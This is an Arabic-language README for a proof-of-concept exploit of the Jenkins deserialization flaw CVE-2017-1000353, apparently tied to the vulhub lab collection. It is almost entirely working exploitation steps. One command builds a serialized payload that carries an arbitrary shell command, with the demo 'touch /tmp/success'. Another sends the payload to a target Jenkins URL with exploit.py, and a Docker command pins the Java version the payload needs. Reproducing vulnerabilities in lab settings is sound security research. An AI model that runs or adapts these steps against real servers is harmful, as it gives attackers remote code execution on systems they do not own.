
jenkins CVE-2017-1000353 POC
كيفية إعادة إنتاج ثغرة Jenkins CVE-2017-1000353؟
استنسخ هذا المستودع، واستخدم الحمولة الجاهزة jenkins_poc.ser مع الأمر التالي:
python exploit.py http://your-ip:8080 jenkins_poc.ser
سيتم بعدها تنفيذ touch /tmp/success.
مهم: يعتمد توليد الحمولة على إصدار Java. تم اختباره بنجاح مع openjdk:8u292. قد لا تعمل إصدارات Java الأخرى بشكل صحيح لتوليد الحمولة والاستغلال.
jenkins_poc.ser؟حمّل CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
إذا كنت تستخدم Docker، يمكنك استخدام الأمر التالي لضمان التوافق:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353